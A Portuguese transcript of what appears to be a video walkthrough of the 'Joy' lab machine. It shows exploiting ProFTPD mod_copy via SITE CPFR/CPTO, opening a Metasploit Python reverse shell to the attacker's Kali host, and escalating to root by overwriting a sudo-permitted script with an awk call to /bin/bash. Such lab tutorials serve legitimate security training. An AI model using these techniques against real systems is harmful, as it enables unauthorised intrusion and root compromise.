Fala pessoal, beleza? Vamos começar aqui então a nossa quarta máquina, que é o Joy. Essa máquina aqui é uma máquina OSCP-like, né? O próprio desenvolvedor aqui da máquina já descreveu aqui que é uma máquina para você estudar aí para OSCP. Então, na hora de fazer a instalação dessa máquina, eu baixei aqui o arquivo 7-zip aqui. Quando quando eu fui fazer a instalação, né, do OVF aqui dentro do VirtualBox, ele deu um erro de hash que não bateu o hash do arquivo. Então eu subi uma máquina com Debian normalmente, né, como se fosse instalando do zero uma máquina Debian e utilizei essa ISO aqui como instalação do instalador do sistema e ele já subiu direto essa máquina aqui. O que a gente vai explorar nessa máquina é uma falha na implementação de um módulo do módulo modcopy dentro do servidor FTP pro FTPD, na versão 1.3x aqui, ó. Para quem não sabe o que é o pro FTPD, ele é um servidor de FTP. Então, dentro dessa versão aqui, utilizando o modcopy, que é um módulo do pro FTPD, a gente consegue usar os comandos site cpfr e site cpto para movimentar arquivos dentro do servidor. Então é assim que a gente vai explorar a falha dessa máquina, né? Para explorar essa falha utilizando o modcopy, para você conseguir executar esse exploit aqui, né, que é um exploit de RCE, você vai conseguir abrir uma shell, né, com o servidor e executar comandos remotos. Esse aqui é um módulo do Metasploit, tá? Dentro do Metasploit tem esse exploit aqui. Ele utiliza o site CPTO e o site CPFR para conseguir movimentar um arquivo. Essa shell aqui, ó, PHP System, né, e vai rodar uma shell simples aqui dentro do servidor web. Então tem algumas. Esses links todos que eu estou mostrando para vocês estão aqui na descrição, tá? Para vocês utilizarem aí no diário do desafio. Para que esse ataque seja bem sucedido, existem algumas condições aqui que precisam ser atendidas, né? Então, o primeiro delas é que você tem que ter um acesso do FTP, seja um acesso de usuário anônimo ou então seja um usuário autenticado, né, nesse FTP. Você precisa de um acesso do ProFTPD. Precisa estar habilitado o módulo modcopy dentro do ProFTPD, então às vezes o cara pode desabilitar esse módulo lá. O administrador, né, pode desabilitar esse módulo. Então ele tem que estar habilitado aí para você conseguir explorar a vulnerabilidade. Precisa ter um servidor web nesse cara, então precisa ser acessível, né, o servidor web. Você tem que saber o diretório de root do servidor web. E precisa existir um arquivo, né? Nesse caso ele está usando o exemplo de PHP, mas pode ser qualquer tipo de arquivo dentro do servidor para a gente movimentar utilizando o site CPFR e o site CPTO. Os comandos aí desse mod copy, você precisa ter um arquivo para você manipular dentro do server, ou então você pode você não consegue criar o arquivo utilizando CPFR e CPTO, você tem que movimentar um arquivo que já esteja no servidor. Então aí você vai acessar esse arquivo, né, e vai conseguir executar o seu RCE, vai conseguir mover, né, arquivos e executar comandos arbitrários dentro do server. Então esse vai ser a nossa entrada para a máquina. E dentro dessa máquina, para fazer o escalonamento de privilégio, porque a gente vai conseguir o acesso do usuário da aplicação, né, o usuário do www.data. Então, para a gente conseguir escalonar privilégio, a gente vai utilizar uma linguagem chamada WK. Tem alguns links aqui para vocês entenderem como funciona a WK, que a gente vai criar um arquivo malicioso que vai chamar o /bin/bash dentro de um arquivo que o usuário tem permissão de leitura dentro do server. Então, depois que a gente fizer o primeiro acesso, a gente vai conseguir ver na enumeração lá que o usuário tem permissão de leitura, como de execução, né, de um script como root. A gente vai explorar isso utilizando aí o modcopy, né, para executar para alterar esse arquivo, né, a gente conseguir executar como root e abrir uma sessão como root. Quando você abre essa máquina aí no browser, ela já de cara mostra que tem um OSSEC rodando lá, que é um IDS, né, Host Based. IDS é o Intrusion Detection System, né, é um sistema de detecção de intrusão.
Então tem a documentação aqui, se vocês quiserem dar uma lida como funciona o OSSEC, tem a documentação aqui também, tá tudo aqui embaixo na descrição, beleza? Bom, então chega de papo e vamos aí para a parte prática, né? Estou aqui dentro do meu Kali. Provavelmente na hora que você tentar rodar a scan dentro dessa máquina, talvez ela não te retorne nada, ela diga que está filtrada todas as portas. Então é legal você dar uma interagida com ela primeiro, abre no browser aí primeiro a máquina, né, para você conseguir rodar o scan aí na sequência. O 92.168.2.9 foi o IP que ela pegou aqui na minha infraestrutura. Eu já fiz a exploração dela, por isso que tem alguns arquivos aqui que não vão aparecer aí para vocês, né? Já abriu direto o FTP aqui, já está dando spoiler da máquina já. Esses dois arquivos aqui são arquivos de shell que eu fiz o upload na exploração aqui antes de mostrar para vocês, né? Então ignora, para vocês aí vai aparecer só o OSSEC aqui, que é a primeira coisa que você vai ver que a hora que abrir ele no browser, né? É que está rodando esse cara aqui. Mas pode ignorar esse cara que a gente não vai utilizar ele na exploração. Eu já dei o spoiler do FTP ali, mas vamos rodar aqui o Nmap, menos Szinho Vzão para mostrar a versão dos serviços, menos P maiúsculo N para não utilizar ICMP, para ser mais stealth o scan, senão ele não vai deixar você escanear, dependendo do quão agressivo for o scan, essa máquina não vai responder para você o scan. Vou dar um menos V de verboso aqui, o 92.168.2.9, que é o IP da minha estrutura aqui, né? Olha, já mostrou que tem uma porrada de porta aberta. Vou esperar ele terminar o scan aqui para a gente fazer uma análise dele. Já mostrou que tem 12 serviços rodando aqui, né? A gente disse bem que a gente rodou só as principais portas, né? A gente não colocou o menos P- lá para escanear todas as portas. Mas olha, tem um monte de serviço rodando, então na vida real você sairia procurando vulnerabilidade nesses serviços, né? Tem as versões aqui do serviço, então você pode procurar vulnerabilidade nelas. E o que interessa para a gente aqui é o ProFTPD. Ele está mostrando aqui ó, a versão 1.2.10, que não é o que realmente está rodando na máquina. Se você for nessa, né, talvez você você imagine que não esteja vulnerável. Talvez o de você esteja mostrando só o ProFTPD, sem a versão, depende de como que você rodou o scan aí. Então, lembra que uma das premissas aí para a gente conseguir explorar a falha lá do modcopy é a gente conseguir acessar esse ProFTPD de alguma forma, né? Eu vou mostrar uma coisa para vocês aqui, deixa eu abrir o Metasploit, que quando você estiver fazendo um pentest aí na vida real, você vai achar vários servidores FTP, né? E para você testar se esses caras estão acessíveis com um usuário anônimo ou não, você não vai sair acessando um por um na mão, né? Você pode rodar alguns scripts e até que dentro do Metasploit tem um módulo auxiliar para isso. Então você der um use auxiliar scanner FTP anonymous, você vai conseguir dar um options aqui, você vai conseguir rodar testar vários servers de uma vez só. Então ele já está com o usuário anônimos aqui, ele vai testar essa senha aqui. Você pode pôr a senha que você quiser, pode colocar até anônimos mesmo ou deixar em branco, não tem problema. E no rhost você vai setar todos os FTPs que você encontrou aí para no seu teste, né? Então set rhosts. Você pode separar os IPs por espaço ou por vírgula. Deixa eu colocar aqui 192.168.2.9, que é o nosso alvo. Aí você dá um run, né? Ele, quando ficar verdinho assim, ó, ele vai mostrar para você que você tem permissão, né? Qual permissão que você tem com esse usuário. Então a gente viu aqui que tem permissão de leitura e escrita com o usuário anônimo, né? A gente já descobriu que está liberado o usuário anônimo. Se você não quisesse rodar assim dentro do Metasploit, você podia conectar aqui FTP 192.168.2.9 Anonymous assim em branco, né? A gente conseguiu o acesso aqui do server, ó. Deixa eu até dar um del aqui. Só para ficar igual de vocês aí, que eu já estava fazendo uns testes antes. Então o de vocês vai estar assim, vai estar download e upload aqui. Então se você lembra que um dos requisitos para explorar a vulnerabilidade é que tem o servidor web, né? A gente já viu que tem esse servidor web. Vamos abrir o FTP aqui no browser. Então aqui você vai conseguir ter o acesso aí
do que está rodando lá, né? Na pasta de downloads não tem nada. Se você entrar aqui na pasta de uploads, tem um monte de diretório aqui, um monte de coisa inútil, né? Você entra aí no diretório, ó, tem algumas coisas aqui dentro. Até tem um aqui que fala que se você estiver desesperado é pra você ficar com calma. Aqui. Se você não sabe o que fazer, né? Então, aqui no o primeiro arquivo aqui, ó, ele roda provavelmente tem um script lá dentro do server que roda um ls-lh, alguma coisa do tipo, dentro do diretório do Patrick. Mas o que a gente tem aqui é uma saída, né, de um ls mostrando aqui o diretório raiz do Patrick, ó, Patrick's Directory aqui. Então ele está mostrando tudo que está rodando lá no diretório raiz do Patrick. Então a gente sabe que isso aqui é um monte de arquivo, ó, legal. Se você começar a olhar o nome dos arquivos aqui mais para baixo tem um arquivo que chama atenção aqui, ó, que é um arquivo de controle de versão. Quer ver, ó? Deixa eu achar onde que ele está aqui. Cadê o version? Aqui, ó, version control. É um arquivo de controle de versão. Só que daí você pensa assim, né? Pô, mas como é que eu vou acessar esse arquivo dentro do servidor se esse arquivo não está disponível na raiz aqui do FTP? Lembra da falha lá do mod copy? Agora é a hora da gente testar essa falha. Travou meu Kali aqui, peraí. Que legal. Beleza. Então agora é hora da gente testar a falha lá dentro do server. Então a primeira coisa que a gente vai fazer é se conectar no FTP de uma maneira que a gente consiga enviar comandos. Então a gente pode fazer isso via Telnet, mas a gente vai utilizar o Netcat aqui para isso. O NC 192.168.2.9 na porta 21, que é a porta que está rodando o FTP lá. A gente já recebeu aqui, né, o 220 aqui, ele está mostrando que conectou lá no FTP Server. Então aqui a gente já consegue enviar comandos para lá. A gente viu que no diretório raiz do Patrick tem o arquivo version underline control. Então o que a gente vai fazer? Vai utilizar o site cpfr para encontrar o arquivo lá dentro, né, barra home. A gente sabe que o diretório raiz no Linux é barra home barra nome do usuário, né? Então barra home barra Patrick, que é o usuário que a gente viu o script lá que mostra, né, um ls lá dentro do diretório dele, barra version control, que é o arquivo que a gente quer ler. Então o site CPFR encontrou o arquivo, ele diz que existe esse arquivo ou diretório dentro do server, então agora ele já está pronto para copiar para algum lugar. Então vamos dar um site cpto, que é para a gente copiar isso para algum lugar, e vamos copiar lá para o diretório raiz do FTP, que eu tenho, o usuário do FTP fica em barra home barra FTP. Então eu preciso passar um nome pro arquivo, vou chamar ele de novo de version control, né? Para ficar igual estava. Se você quisesse colocar outro nome, podia colocar também. Então veja que a gente não consegue criar um arquivo, né, utilizando essa falha. A gente consegue só copiar os arquivos, né, mover os arquivos. Ó. Então a cópia deu sucesso. Então agora, se eu for lá no servidor, deixa eu abrir aqui no browser de novo. Deixa eu abrir o browser. Peraí. Se eu vier aqui nesse cara, né, vou dar um ftp, dois pontos barra barra. Ele copiou o arquivo para cá, ó, a version control. Então, se você abrir esse arquivo, ele é um arquivinho de texto aqui, ó. Né, o teu provavelmente vai abrir aí no browser, depende do browser que você está usando. Mas ele mostra aqui que dentro desse arquivo, ele está dizendo para a gente a versão aqui do ProFTPD, né, 135, e ele está dizendo que ele alterou o diretório raiz do web server de var www.html para var www tryharder is joy, né? É o diretório que o cara alterou lá a raiz do servidor web. Por que isso é importante para a gente? Lembra que a gente precisa saber onde que é a raiz do servidor web para explorar
a falha, né, para inserir um comando lá para a gente abrir a nossa sessão com esse server. Então vamos abrir aqui o nosso Metasploit. Dar um search aqui, ProFTPD. O que a gente vai utilizar é esse exploit 5 aqui, ó, Unix FTP ProFTPD mod copy exec, que é aquele exploit que explora essa mesma falha que a gente explorou manualmente. Agora a gente vai utilizar um módulo do Metasploit aqui, não é exploit do Metasploit, para conseguir abrir a sessão lá. Então vou dar um use 5 aqui, que é o número do exploit. Então aqui a gente tem que setar o rhosts, né? rhosts 192.68.2.9, que é o endereço lá do nosso alvo. A porta 80 está certo, né? A porta do FTP também está certo. Só que aqui, ó, o site path está errado, porque ele está no /var/www. E o cara alterou o diretório lá, né? Então vou dar um set site path /var www trying harder is joy, que é o que o cara mudou lá de diretório do web server dele. Então agora a gente tem que setar um payload aqui, set payload. Se você der um tab aqui, né, um tab, ele vai completar os possíveis payloads. A gente vai usar uma conexão reversa, né, para fazer o servidor conectar na gente. E se você der um tab de novo, ele mostra as opções. A gente vai usar o Python mesmo para fazer a conexão reversa. Tem um options aqui de volta. Agora a gente tem que setar o lhost, né, que é a gente. Set lhosts, o IP do nosso Kali, 192.168.2.5 é o IP do meu Kali aqui. Set lport 443, como sempre, né, para a gente não utilizar aquela porta 4444 ali. Então, a hora que ele executar lá, ele vai abrir um /bin /bash lá na máquina. Então, eu vou dar um exploit aqui. Falhou para executar o payload. Ah, porque eu tô com o Metasploit aberto aqui travado na outra janela. Pera aí. Ele não vai deixar mesmo. Só matar o Metasploit aqui rapidinho, 3305. É que travou minha VM ali. E ela travou nessa outra janela aqui tá aberto o Metasploit, ó, ele não deixa eu abrir. Por isso que não rodou o exploit aqui. Pera aí. Só para ver se ainda tá rodando. Tá, fechou. Agora vai rodar. Search ProFTPD. Use 5. Set lhost 92.68.2.9. Set path. Set site path. Reverse Python. Set lhost 192.168.2.5, que é o IP do meu Kali. Set lport 443. Opa. Faltou setar o rhosts. Set rhosts 192.168.2.9. Beleza, agora ele executou. Eu só fiz rapidinho de volta porque eu já tinha explicado para vocês, tá? Mas é que eu tive que matar o processo do Metasploit porque travou essa janela aqui, ó, na VM e tava com o Metasploit aberto ali nessa outra janela. Aí por isso que não rodou o exploit, tá? Mas ó, agora ele abriu a sessão aqui, então a gente já caiu aqui no usuário www.data. Então como é que ele fez isso? Ele usou o mod copy lá dentro do ProFTPD
para inserir esse arquivo aqui, ó, E9KHL, blá blá blá, cada hora ele gera um payload aleatório, né? Ele jogou isso aqui dentro do web server e fez uma chamada para ele, e a hora que ele chamou, então abriu a sessão. E esse payload aqui é uma shell simples, né? Então, basicamente, ele explorou a falha que a gente explorou manualmente já hoje para inserir esse arquivo dentro do server e abrir essa sessão. Então, agora, navegando aqui dentro do server, se você for em OSSEC, tem um arquivo aqui, ó, Patrick Secret of Joy. Deixa eu copiar esse arquivo aqui que é mais fácil que digitar. Então eu dei um cat aqui dentro desse arquivo. Ele mostrou pra gente aqui a senha do Patrick, ó, o usuário, a credenciais for Joy, né? O Patrick e a senha e root e a senha. Só que essa senha aqui não é a senha de root. Se você tentar se logar com essa senha de root aqui, você não vai conseguir. Então a gente vai tentar se logar aqui com o usuário do Patrick. Para a gente conseguir se logar aqui, deixa eu só criar uma shell interativa. Vamos dar um Python "-c" de linha de comando, abre aspas simples, né, import pty, que é para importar o módulo do pty, que é para a gente poder ter essa shell interativa aqui. Ponto e vírgula vai quebrar a linha, então agora a gente vai instanciar o spawn para a função spawn aqui para poder chamar o barra bin barra bash. Então é pty.spawn barra bin barra bash. Fecha aspas simples para encerrar o comando. A gente conseguiu aqui então uma sessão aqui, uma shell como se tivesse, né, acessado via SSH, coisa do tipo. Então agora eu vou dar um sul Patrick para trocar para o usuário do Patrick, e a senha do Patrick a gente viu aqui em cima, né, que é a Apollo 098765. Então a gente conseguiu se logar aqui com o usuário do Patrick. Para a gente poder ver as permissões que o Patrick tem dentro da máquina aqui, né, como administrador, posso dar um sudo "-l". Isso mostra aqui o que dentro do arquivo sudoers, no /etc/sudoers, ele lá tem as configurações, né, do que o usuário pode acessar como root utilizando o sudo. E o Patrick, a permissão que ele tem aqui sem senha, né, é para executar o script que está em /home /patrick /scripts /test. Então a gente vai explorar de novo a falha aí do modcopy para conseguir alterar esse arquivo para um arquivo malicioso nosso. Lembra que eu falei que a gente ia utilizar o AWK, a linguagem AWK para escrever, né, esse arquivo malicioso? Não está abrindo outro terminal aqui, que legal. Espera aí. Deixa eu fazer o seguinte, eu vou abrir aqui fora mesmo. Espera aí. É isso aí, vários BO mesmo. É bom que aí vocês já vão vendo os BO e se eu cortar na edição aqui, vocês não vão ver aí os BOs. Deixa eu dar um Ctrl mais aqui também para ficar grandão para vocês verem. Eu vou criar um arquivo aqui nesse arquivo a gente vai rodar vai usar o AWK para criar, né, para chamar um módulo de sistema e chamar o barra bin barra bash. Então a gente vai escrever em AWK aqui que a gente quer utilizar o system para executar o barra bin barra bash. Fecho aspas aqui. Beleza. Opa, faltou a AWK aqui, daí não funciona, né? Agora vai. E eu vou salvar isso aqui, vou jogar essa saída, né, no arquivo chamado teste. Por que a gente está escrevendo esse arquivo aqui fora? Porque eu vou explorar a falha do modcopy de novo para alterar esse arquivo lá dentro do server. Então, agora se eu der um
aqui um ls na minha máquina aqui, eu sei que eu criei o arquivo teste aqui. Então como é que eu vou jogar isso para dentro do server? Primeiro vamos conectar no FTP lá, né? 192.68.2.9 Anonymous. Lembre que a gente não consegue criar o arquivo dentro do server, a gente só consegue mover. Então agora eu vou fazer um put aqui, que é para fazer o upload do arquivo teste. Ele já fez o upload, então dando um ls aqui, ó, o arquivo teste já está na raiz aqui, né, no /home /ftp. Agora eu posso sair aqui do FTP. Agora a gente vai explorar de novo a falha lá do modcopy para conseguir mover esse arquivo para dentro do server. Mover ele para dentro do arquivo certo lá no server. Então agora eu vou usar o netcat de novo. 192.68.2.9 na porta 21. Conectou no FTP. Então agora a gente vai utilizar os comandinhos lá de dentro do modcopy, né, que é o site cpfr e o site cpto. Então vou dar um site cpfr para encontrar o arquivo lá que está em /home /ftp /teste. Tá, ele encontrou o arquivo. Agora eu vou dar um site cpto para copiar, para mover o arquivo para /home /patrick /script /teste, que é esse diretório aqui, ó, /home /patrick /script /teste. Então ele conseguiu copiar o arquivo com sucesso. Então agora aqui dentro da nossa sessão, né, eu posso executar o arquivo com o sudo. Então eu vou dar um sudo /home /patrick /script /teste, e quando eu executar esse cara, a gente está aqui como root, porque a gente fez com que utilizou o AWK lá para chamar o /bin /bash e alterou, né? Então esse script que existia aqui dentro já existia esse script dentro do diretório do Patrick, e ele tinha permissão de execução desse script, né, como root. Então agora que a gente conseguiu executar esse script, né, a gente caiu aqui então como root. Beleza? Obrigado aí por terem acompanhado esse vídeo. Foi um pouco mais longo aí. Essa máquina é bem mais difícil do que as anteriores, né? E agora a gente vai começar a suar com as próximas máquinas aí. Fechado? Se não se inscreveu no canal ainda, se inscreve aí. Qualquer dúvida, manda lá no grupo. E aqui embaixo na descrição tá o link para download da máquina de amanhã. Então, boa sorte aí para a próxima máquina, pessoal. E até a próxima aí. Falou!